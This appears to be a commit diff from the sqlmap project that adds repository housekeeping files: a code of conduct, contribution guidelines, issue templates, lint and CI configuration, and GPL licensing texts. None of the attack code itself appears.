Minor update for Firebird

Couple of trivial updates
Trivial update
2025-12-06 20:51:31 +00:00 · 2019-09-02 12:22:32 +02:00 · 2019-08-30 14:43:56 +02:00 · 2019-08-29 17:07:16 +02:00 · 2019-08-27 13:41:30 +02:00 · 2019-08-27 13:39:18 +02:00
597 changed files with 110122 additions and 30309 deletions
--- a/.gitattributes
+++ b/.gitattributes
@@ -0,0 +1,19 @@
+*.conf text eol=lf
+*.md text eol=lf
+*.md5 text eol=lf
+*.py text eol=lf
+*.xml text eol=lf
+LICENSE text eol=lf
+COMMITMENT text eol=lf
+
+*_ binary
+*.dll binary
+*.pdf binary
+*.so binary
+*.wav binary
+*.zip binary
+*.x32 binary
+*.x64 binary
+*.exe binary
+*.sln binary
+*.vcproj binary
--- a/.github/CODE_OF_CONDUCT.md
+++ b/.github/CODE_OF_CONDUCT.md
@@ -0,0 +1,46 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/
--- a/.github/CONTRIBUTING.md
+++ b/.github/CONTRIBUTING.md
@@ -0,0 +1,36 @@
+# Contributing to sqlmap
+
+## Reporting bugs
+
+**Bug reports are welcome**!
+Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
+
+### Guidelines
+
+* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
+* Make sure you can reproduce the bug with the latest development version of sqlmap.
+* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
+* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
+
+## Submitting code changes
+
+All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
+
+Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
+Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
+
+### Guidelines
+
+In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
+
+* Each patch should make one logical change.
+* Avoid tabbing, use four blank spaces instead.
+* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
+* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
+* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
+* Style that is too different from main branch will be ''adapted'' by the developers side.
+* Do not touch anything inside `thirdparty/` and `extra/` folders.
+
+### Licensing
+
+By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -0,0 +1,37 @@
+---
+name: Bug report
+about: Create a report to help us improve
+title: ''
+labels: bug report
+assignees: ''
+
+---
+
+**Describe the bug**
+A clear and concise description of what the bug is.
+
+**To Reproduce**
+1. Run '...'
+2. See error
+
+**Expected behavior**
+A clear and concise description of what you expected to happen.
+
+**Screenshots**
+If applicable, add screenshots to help explain your problem.
+
+**Running environment:**
+ - sqlmap version [e.g. 1.3.5.93#dev]
+ - Installation method [e.g. git]
+ - Operating system: [e.g. Microsoft Windows 10]
+ - Python version [e.g. 3.5.2]
+
+**Target details:**
+ - DBMS [e.g. Microsoft SQL Server]
+ - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
+ - WAF/IPS [if any]
+ - Relevant console output [if any]
+ - Exception traceback [if any]
+
+**Additional context**
+Add any other context about the problem here.
--- a/.github/ISSUE_TEMPLATE/feature_request.md
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -0,0 +1,20 @@
+---
+name: Feature request
+about: Suggest an idea for this project
+title: ''
+labels: feature request
+assignees: ''
+
+---
+
+**Is your feature request related to a problem? Please describe.**
+A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+
+**Describe the solution you'd like**
+A clear and concise description of what you want to happen.
+
+**Describe alternatives you've considered**
+A clear and concise description of any alternative solutions or features you've considered.
+
+**Additional context**
+Add any other context or screenshots about the feature request here.
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,8 @@
+output/
+__pycache__/
+*.py[cod]
+.sqlmap_history
+traffic.txt
+*~
+req*.txt
+.idea/
--- a/.pylintrc
+++ b/.pylintrc
@@ -0,0 +1,546 @@
+# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker
+
+[MASTER]
+
+# Specify a configuration file.
+#rcfile=
+
+# Python code to execute, usually for sys.path manipulation such as
+# pygtk.require().
+init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))"
+
+# Add files or directories to the blacklist. They should be base names, not
+# paths.
+ignore=
+
+# Pickle collected data for later comparisons.
+persistent=no
+
+# List of plugins (as comma separated values of python modules names) to load,
+# usually to register additional checkers.
+load-plugins=
+
+# Use multiple processes to speed up Pylint.
+# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!!
+jobs=1
+
+# Allow loading of arbitrary C extensions. Extensions are imported into the
+# active Python interpreter and may run arbitrary code.
+unsafe-load-any-extension=no
+
+# A comma-separated list of package or module names from where C extensions may
+# be loaded. Extensions are loading into the active Python interpreter and may
+# run arbitrary code
+extension-pkg-whitelist=
+
+# Allow optimization of some AST trees. This will activate a peephole AST
+# optimizer, which will apply various small optimizations. For instance, it can
+# be used to obtain the result of joining multiple strings with the addition
+# operator. Joining a lot of strings can lead to a maximum recursion error in
+# Pylint and this flag can prevent that. It has one side effect, the resulting
+# AST will be different than the one from reality.
+optimize-ast=no
+
+
+[MESSAGES CONTROL]
+
+# Only show warnings with the listed confidence levels. Leave empty to show
+# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED
+confidence=
+
+# Enable the message, report, category or checker with the given id(s). You can
+# either give multiple identifier separated by comma (,) or put this option
+# multiple time. See also the "--disable" option for examples.
+disable=all
+
+enable=import-error,
+       import-self,
+       reimported,
+       wildcard-import,
+       misplaced-future,
+       deprecated-module,
+       unpacking-non-sequence,
+       invalid-all-object,
+       undefined-all-variable,
+       used-before-assignment,
+       cell-var-from-loop,
+       global-variable-undefined,
+       redefine-in-handler,
+       unused-import,
+       unused-wildcard-import,
+       global-variable-not-assigned,
+       undefined-loop-variable,
+       global-at-module-level,
+       bad-open-mode,
+       redundant-unittest-assert,
+       boolean-datetime
+       deprecated-method,
+       anomalous-unicode-escape-in-string,
+       anomalous-backslash-in-string,
+       not-in-loop,
+       continue-in-finally,
+       abstract-class-instantiated,
+       star-needs-assignment-target,
+       duplicate-argument-name,
+       return-in-init,
+       too-many-star-expressions,
+       nonlocal-and-global,
+       return-outside-function,
+       return-arg-in-generator,
+       invalid-star-assignment-target,
+       bad-reversed-sequence,
+       nonexistent-operator,
+       yield-outside-function,
+       init-is-generator,
+       nonlocal-without-binding,
+       lost-exception,
+       assert-on-tuple,
+       dangerous-default-value,
+       duplicate-key,
+       useless-else-on-loop
+       expression-not-assigned,
+       confusing-with-statement,
+       unnecessary-lambda,
+       pointless-statement,
+       pointless-string-statement,
+       unnecessary-pass,
+       unreachable,
+       using-constant-test,
+       bad-super-call,
+       missing-super-argument,
+       slots-on-old-class,
+       super-on-old-class,
+       property-on-old-class,
+       not-an-iterable,
+       not-a-mapping,
+       format-needs-mapping,
+       truncated-format-string,
+       missing-format-string-key,
+       mixed-format-string,
+       too-few-format-args,
+       bad-str-strip-call,
+       too-many-format-args,
+       bad-format-character,
+       format-combined-specification,
+       bad-format-string-key,
+       bad-format-string,
+       missing-format-attribute,
+       missing-format-argument-key,
+       unused-format-string-argument
+       unused-format-string-key,
+       invalid-format-index,
+       bad-indentation,
+       mixed-indentation,
+       unnecessary-semicolon,
+       lowercase-l-suffix,
+       invalid-encoded-data,
+       unpacking-in-except,
+       import-star-module-level,
+       long-suffix,
+       old-octal-literal,
+       old-ne-operator,
+       backtick,
+       old-raise-syntax,
+       metaclass-assignment,
+       next-method-called,
+       dict-iter-method,
+       dict-view-method,
+       indexing-exception,
+       raising-string,
+       using-cmp-argument,
+       cmp-method,
+       coerce-method,
+       delslice-method,
+       getslice-method,
+       hex-method,
+       nonzero-method,
+       t-method,
+       setslice-method,
+       old-division,
+       logging-format-truncated,
+       logging-too-few-args,
+       logging-too-many-args,
+       logging-unsupported-format,
+       logging-format-interpolation,
+       invalid-unary-operand-type,
+       unsupported-binary-operation,
+       not-callable,
+       redundant-keyword-arg,
+       assignment-from-no-return,
+       assignment-from-none,
+       not-context-manager,
+       repeated-keyword,
+       missing-kwoa,
+       no-value-for-parameter,
+       invalid-sequence-index,
+       invalid-slice-index,
+       unexpected-keyword-arg,
+       unsupported-membership-test,
+       unsubscriptable-object,
+       access-member-before-definition,
+       method-hidden,
+       assigning-non-slot,
+       duplicate-bases,
+       inconsistent-mro,
+       inherit-non-class,
+       invalid-slots,
+       invalid-slots-object,
+       no-method-argument,
+       no-self-argument,
+       unexpected-special-method-signature,
+       non-iterator-returned,
+       arguments-differ,
+       signature-differs,
+       bad-staticmethod-argument,
+       non-parent-init-called,
+       bad-except-order,
+       catching-non-exception,
+       bad-exception-context,
+       notimplemented-raised,
+       raising-bad-type,
+       raising-non-exception,
+       misplaced-bare-raise,
+       duplicate-except,
+       nonstandard-exception,
+       binary-op-exception,
+       not-async-context-manager,
+       yield-inside-async-function
+
+# Needs investigation:
+# abstract-method (might be indicating a bug? probably not though)
+# protected-access (requires some refactoring)
+# attribute-defined-outside-init (requires some refactoring)
+# super-init-not-called (requires some cleanup)
+
+# Things we'd like to enable someday:
+# redefined-builtin (requires a bunch of work to clean up our code first)
+# redefined-outer-name (requires a bunch of work to clean up our code first)
+# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760)
+# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73)
+# unused-argument (need to clean up or code a lot, e.g. prefix unused_?)
+# function-redefined (@overload causes lots of spurious warnings)
+# too-many-function-args (@overload causes spurious warnings... I think)
+# parameter-unpacking (needed for eventual Python 3 compat)
+# print-statement (needed for eventual Python 3 compat)
+# filter-builtin-not-iterating (Python 3)
+# map-builtin-not-iterating (Python 3)
+# range-builtin-not-iterating (Python 3)
+# zip-builtin-not-iterating (Python 3)
+# many others relevant to Python 3
+# unused-variable (a little work to cleanup, is all)
+
+# ...
+[REPORTS]
+
+# Set the output format. Available formats are text, parseable, colorized, msvs
+# (visual studio) and html. You can also give a reporter class, eg
+# mypackage.mymodule.MyReporterClass.
+output-format=parseable
+
+# Put messages in a separate file for each module / package specified on the
+# command line instead of printing them on stdout. Reports (if any) will be
+# written in a file name "pylint_global.[txt|html]".
+files-output=no
+
+# Tells whether to display a full report or only the messages
+reports=no
+
+# Python expression which should return a note less than 10 (10 is the highest
+# note). You have access to the variables errors warning, statement which
+# respectively contain the number of errors / warnings messages and the total
+# number of statements analyzed. This is used by the global evaluation report
+# (RP0004).
+evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
+
+# Template used to display messages. This is a python new-style format string
+# used to format the message information. See doc for all details
+#msg-template=
+
+
+[LOGGING]
+
+# Logging modules to check that the string format arguments are in logging
+# function parameter format
+logging-modules=logging
+
+
+[FORMAT]
+
+# Maximum number of characters on a single line.
+max-line-length=100
+
+# Regexp for a line that is allowed to be longer than the limit.
+ignore-long-lines=^\s*(# )?<?https?://\S+>?$
+
+# Allow the body of an if to be on the same line as the test if there is no
+# else.
+single-line-if-stmt=no
+
+# List of optional constructs for which whitespace checking is disabled. `dict-
+# separator` is used to allow tabulation in dicts, etc.: {1  : 1,\n222: 2}.
+# `trailing-comma` allows a space between comma and closing bracket: (a, ).
+# `empty-line` allows space-only lines.
+no-space-check=trailing-comma,dict-separator
+
+# Maximum number of lines in a module
+max-module-lines=1000
+
+# String used as indentation unit. This is usually "    " (4 spaces) or "\t" (1
+# tab).
+indent-string='    '
+
+# Number of spaces of indent required inside a hanging  or continued line.
+indent-after-paren=4
+
+# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
+expected-line-ending-format=
+
+
+[TYPECHECK]
+
+# Tells whether missing members accessed in mixin class should be ignored. A
+# mixin class is detected if its name ends with "mixin" (case insensitive).
+ignore-mixin-members=yes
+
+# List of module names for which member attributes should not be checked
+# (useful for modules/projects where namespaces are manipulated during runtime
+# and thus existing member attributes cannot be deduced by static analysis. It
+# supports qualified module names, as well as Unix pattern matching.
+ignored-modules=thirdparty.six.moves
+
+# List of classes names for which member attributes should not be checked
+# (useful for classes with attributes dynamically set). This supports can work
+# with qualified names.
+ignored-classes=
+
+# List of members which are set dynamically and missed by pylint inference
+# system, and so shouldn't trigger E1101 when accessed. Python regular
+# expressions are accepted.
+generated-members=
+
+
+[VARIABLES]
+
+# Tells whether we should check for unused import in __init__ files.
+init-import=no
+
+# A regular expression matching the name of dummy variables (i.e. expectedly
+# not used).
+dummy-variables-rgx=_$|dummy
+
+# List of additional names supposed to be defined in builtins. Remember that
+# you should avoid to define new builtins when possible.
+additional-builtins=
+
+# List of strings which can identify a callback function by name. A callback
+# name must start or end with one of those strings.
+callbacks=cb_,_cb
+
+
+[SIMILARITIES]
+
+# Minimum lines number of a similarity.
+min-similarity-lines=4
+
+# Ignore comments when computing similarities.
+ignore-comments=yes
+
+# Ignore docstrings when computing similarities.
+ignore-docstrings=yes
+
+# Ignore imports when computing similarities.
+ignore-imports=no
+
+
+[SPELLING]
+
+# Spelling dictionary name. Available dictionaries: none. To make it working
+# install python-enchant package.
+spelling-dict=
+
+# List of comma separated words that should not be checked.
+spelling-ignore-words=
+
+# A path to a file that contains private dictionary; one word per line.
+spelling-private-dict-file=
+
+# Tells whether to store unknown words to indicated private dictionary in
+# --spelling-private-dict-file option instead of raising a message.
+spelling-store-unknown-words=no
+
+
+[MISCELLANEOUS]
+
+# List of note tags to take in consideration, separated by a comma.
+notes=FIXME,XXX,TODO
+
+
+[BASIC]
+
+# List of builtins function names that should not be used, separated by a comma
+bad-functions=map,filter,input
+
+# Good variable names which should always be accepted, separated by a comma
+good-names=i,j,k,ex,Run,_
+
+# Bad variable names which should always be refused, separated by a comma
+bad-names=foo,bar,baz,toto,tutu,tata
+
+# Colon-delimited sets of names that determine each other's naming style when
+# the name regexes allow several styles.
+name-group=
+
+# Include a hint for the correct naming format with invalid-name
+include-naming-hint=no
+
+# Regular expression matching correct function names
+function-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for function names
+function-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct variable names
+variable-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for variable names
+variable-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct constant names
+const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$
+
+# Naming hint for constant names
+const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$
+
+# Regular expression matching correct attribute names
+attr-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for attribute names
+attr-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct argument names
+argument-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for argument names
+argument-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct class attribute names
+class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
+
+# Naming hint for class attribute names
+class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
+
+# Regular expression matching correct inline iteration names
+inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$
+
+# Naming hint for inline iteration names
+inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$
+
+# Regular expression matching correct class names
+class-rgx=[A-Z_][a-zA-Z0-9]+$
+
+# Naming hint for class names
+class-name-hint=[A-Z_][a-zA-Z0-9]+$
+
+# Regular expression matching correct module names
+module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
+
+# Naming hint for module names
+module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
+
+# Regular expression matching correct method names
+method-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for method names
+method-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression which should only match function or class names that do
+# not require a docstring.
+no-docstring-rgx=^_
+
+# Minimum line length for functions/classes that require docstrings, shorter
+# ones are exempt.
+docstring-min-length=-1
+
+
+[ELIF]
+
+# Maximum number of nested blocks for function / method body
+max-nested-blocks=5
+
+
+[IMPORTS]
+
+# Deprecated modules which should not be used, separated by a comma
+deprecated-modules=regsub,TERMIOS,Bastion,rexec
+
+# Create a graph of every (i.e. internal and external) dependencies in the
+# given file (report RP0402 must not be disabled)
+import-graph=
+
+# Create a graph of external dependencies in the given file (report RP0402 must
+# not be disabled)
+ext-import-graph=
+
+# Create a graph of internal dependencies in the given file (report RP0402 must
+# not be disabled)
+int-import-graph=
+
+
+[DESIGN]
+
+# Maximum number of arguments for function / method
+max-args=5
+
+# Argument names that match this expression will be ignored. Default to name
+# with leading underscore
+ignored-argument-names=_.*
+
+# Maximum number of locals for function / method body
+max-locals=15
+
+# Maximum number of return / yield for function / method body
+max-returns=6
+
+# Maximum number of branch for function / method body
+max-branches=12
+
+# Maximum number of statements in function / method body
+max-statements=50
+
+# Maximum number of parents for a class (see R0901).
+max-parents=7
+
+# Maximum number of attributes for a class (see R0902).
+max-attributes=7
+
+# Minimum number of public methods for a class (see R0903).
+min-public-methods=2
+
+# Maximum number of public methods for a class (see R0904).
+max-public-methods=20
+
+# Maximum number of boolean expressions in a if statement
+max-bool-expr=5
+
+
+[CLASSES]
+
+# List of method names used to declare (i.e. assign) instance attributes.
+defining-attr-methods=__init__,__new__,setUp
+
+# List of valid names for the first argument in a class method.
+valid-classmethod-first-arg=cls
+
+# List of valid names for the first argument in a metaclass class method.
+valid-metaclass-classmethod-first-arg=mcs
+
+# List of member names, which should be excluded from the protected access
+# warning.
+exclude-protected=_asdict,_fields,_replace,_source,_make
+
+
+[EXCEPTIONS]
+
+# Exceptions that will emit a warning when being caught. Defaults to
+# "Exception"
+overgeneral-exceptions=Exception
--- a/.travis.yml
+++ b/.travis.yml
@@ -0,0 +1,14 @@
+language: python
+dist: trusty
+sudo: false
+git:
+    depth: 1
+python:
+    - "2.6"
+    - "2.7"
+    - "3.3"
+    - "3.6"
+script:
+    - python -c "import sqlmap; import sqlmapapi"
+    - python sqlmap.py --smoke
+    - python sqlmap.py --vuln
--- a/46
+++ b/46
@@ -0,0 +1,46 @@
+GPL Cooperation Commitment
+Version 1.0
+
+Before filing or continuing to prosecute any legal proceeding or claim
+(other than a Defensive Action) arising from termination of a Covered
+License, we commit to extend to the person or entity ('you') accused
+of violating the Covered License the following provisions regarding
+cure and reinstatement, taken from GPL version 3. As used here, the
+term 'this License' refers to the specific Covered License being
+enforced.
+
+    However, if you cease all violation of this License, then your
+    license from a particular copyright holder is reinstated (a)
+    provisionally, unless and until the copyright holder explicitly
+    and finally terminates your license, and (b) permanently, if the
+    copyright holder fails to notify you of the violation by some
+    reasonable means prior to 60 days after the cessation.
+
+    Moreover, your license from a particular copyright holder is
+    reinstated permanently if the copyright holder notifies you of the
+    violation by some reasonable means, this is the first time you
+    have received notice of violation of this License (for any work)
+    from that copyright holder, and you cure the violation prior to 30
+    days after your receipt of the notice.
+
+We intend this Commitment to be irrevocable, and binding and
+enforceable against us and assignees of or successors to our
+copyrights.
+
+Definitions
+
+'Covered License' means the GNU General Public License, version 2
+(GPLv2), the GNU Lesser General Public License, version 2.1
+(LGPLv2.1), or the GNU Library General Public License, version 2
+(LGPLv2), all as published by the Free Software Foundation.
+
+'Defensive Action' means a legal proceeding or claim that We bring
+against you in response to a prior proceeding or claim initiated by
+you or your affiliate.
+
+'We' means each contributor to this repository as of the date of
+inclusion of this file, including subsidiaries of a corporate
+contributor.
+
+This work is available under a Creative Commons Attribution-ShareAlike
+4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).
--- a/doc/COPYING
+++ b/doc/COPYING
@@ -1,8 +1,76 @@
+COPYING -- Describes the terms under which sqlmap is distributed. A copy
+of the GNU General Public License (GPL) is appended to this file.
+
+sqlmap is (C) 2006-2019 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+
+This program is free software; you may redistribute and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
+redistribute this software under certain conditions. If you wish to embed
+sqlmap technology into proprietary software, we sell alternative licenses
+(contact sales@sqlmap.org).
+
+Note that the GPL places important restrictions on "derived works", yet it
+does not provide a detailed definition of that term. To avoid
+misunderstandings, we interpret that term as broadly as copyright law
+allows. For example, we consider an application to constitute a "derived
+work" for the purpose of this license if it does any of the following:
+* Integrates source code from sqlmap.
+* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml
+* Executes sqlmap and parses the results (as opposed to typical shell or
+  execution-menu apps, which simply display raw sqlmap output and so are
+  not derivative works).
+* Integrates/includes/aggregates sqlmap into a proprietary executable
+  installer, such as those produced by InstallShield.
+* Links to a library or executes a program that does any of the above
+
+The term "sqlmap" should be taken to also include any portions or derived
+works of sqlmap. This list is not exclusive, but is meant to clarify our
+interpretation of derived works with some common examples. Our
+interpretation applies only to sqlmap - we do not speak for other people's
+GPL works.
+
+This license does not apply to the third-party components. More details can
+be found inside the file 'doc/THIRD-PARTY.md'.
+
+If you have any questions about the GPL licensing restrictions on using
+sqlmap in non-GPL works, we would be happy to help. As mentioned above,
+we also offer alternative license to integrate sqlmap into proprietary
+applications and appliances.
+
+If you received these files with a written license agreement or contract
+stating terms other than the terms above, then that alternative license
+agreement takes precedence over these comments.
+
+Source is provided to this software because we believe users have a right
+to know exactly what a program is going to do before they run it.
+
+Source code also allows you to fix bugs and add new features. You are
+highly encouraged to send your changes to dev@sqlmap.org for possible
+incorporation into the main distribution. By sending these changes to the
+sqlmap developers or via Git pull request, checking them into the sqlmap
+source code repository, it is understood (unless you specify otherwise)
+that you are offering the sqlmap project the unlimited, non-exclusive
+right to reuse, modify, and relicense the code. sqlmap will always be
+available Open Source, but this is important because the inability to
+relicense code has caused devastating problems for other Free Software
+projects (such as KDE and NASM). If you wish to specify special license
+conditions of your contributions, just say so when you send them.
+
+This program is distributed in the hope that it will be useful, but
+WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+General Public License v2.0 for more details at
+http://www.gnu.org/licenses/gpl-2.0.html, or below
+
+****************************************************************************
+
                    GNU GENERAL PUBLIC LICENSE
                       Version 2, June 1991

- Copyright (C) 1989, 1991 Free Software Foundation, Inc.
-                       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

@@ -15,7 +83,7 @@ software--to make sure the software is free for all its users.  This
 General Public License applies to most of the Free Software
 Foundation's software and to any other program whose authors commit to
 using it.  (Some other Free Software Foundation software is covered by
-the GNU Library General Public License instead.)  You can apply it to
+the GNU Lesser General Public License instead.)  You can apply it to
 your programs, too.

  When we speak of free software, we are referring to freedom, not
@@ -55,7 +123,7 @@ patent must be licensed for everyone's free use or not licensed at all.

  The precise terms and conditions for copying, distribution and
 modification follow.
-
+
                    GNU GENERAL PUBLIC LICENSE
   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION

@@ -110,7 +178,7 @@ above, provided that you also meet all of these conditions:
    License.  (Exception: if the Program itself is interactive but
    does not normally print such an announcement, your work based on
    the Program is not required to print an announcement.)
-
+
 These requirements apply to the modified work as a whole.  If
 identifiable sections of that work are not derived from the Program,
 and can be reasonably considered independent and separate works in
@@ -168,7 +236,7 @@ access to copy from a designated place, then offering equivalent
 access to copy the source code from the same place counts as
 distribution of the source code, even though third parties are not
 compelled to copy the source along with the object code.
-
+
  4. You may not copy, modify, sublicense, or distribute the Program
 except as expressly provided under this License.  Any attempt
 otherwise to copy, modify, sublicense or distribute the Program is
@@ -225,7 +293,7 @@ impose that choice.

 This section is intended to make thoroughly clear what is believed to
 be a consequence of the rest of this License.
-
+
  8. If the distribution and/or use of the Program is restricted in
 certain countries either by patents or by copyrighted interfaces, the
 original copyright holder who places the Program under this License
@@ -278,63 +346,3 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
 POSSIBILITY OF SUCH DAMAGES.

                     END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Library General
-Public License instead of this License.
--- a/README.md
